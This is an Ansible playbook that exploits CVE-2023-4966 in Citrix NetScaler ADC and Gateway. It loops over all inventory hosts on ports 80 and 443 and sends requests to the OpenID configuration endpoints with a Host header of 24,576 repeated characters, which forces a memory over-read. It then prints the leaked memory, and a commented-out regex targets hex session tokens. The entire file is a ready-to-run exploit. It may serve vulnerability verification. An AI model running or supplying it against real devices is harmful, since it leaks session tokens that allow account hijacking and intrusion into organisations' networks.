- name: CVE-2023-4966 Citrix NetScaler ADC and NetScaler Gateway Buffer Overflow Vulnerability Playbook
  gather_facts: false
  hosts: all
  vars:
    uris:
      - "oauth/idp/.well-known/openid-configuration"
      - "oauth/rp/.well-known/openid-configuration"
    ports:
      - 80
      - 443
    pattern: '^([a-f0-9]{32,64})\s*$'
    headers:
      host:
        - "a"
  tasks:
    - name: Connect to device
      ansible.builtin.uri:
        url: "http{{ (item.0 | int == 443) | ternary('s', '') }}://{{ inventory_hostname }}:{{ item.0 }}/{{ item.1 }}"
        method: GET
        timeout: 2
        status_code: 200
        return_content: true
        force: true
        validate_certs: false
        headers:
          Host: "{{ (headers.host * 24576) | join }}"
      loop: "{{ ports | product(uris) }}"
      register: response
      ignore_errors: true
      delegate_to: 127.0.0.1

    - name: Examine device response
      ansible.builtin.debug:
        msg: "Device {{ inventory_hostname }} returned memory dump with content: {{ item.content }}"
      loop: "{{ response.results }}"
      when:
        - response is defined
        - item.status == 200
        #- response.content | regex_search(pattern)
